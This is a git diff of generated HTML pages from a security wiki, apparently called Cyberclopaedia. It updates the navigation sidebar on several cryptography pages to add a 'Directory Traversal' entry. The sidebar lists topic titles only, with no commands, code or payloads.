      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -255,22 +255,6 @@

Leap of Faith - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html index e8016c9f..0824f13e 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html index 3f8ebc8d..40a47f86 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -205,22 +205,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html index 91ac5bff..e9560ead 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
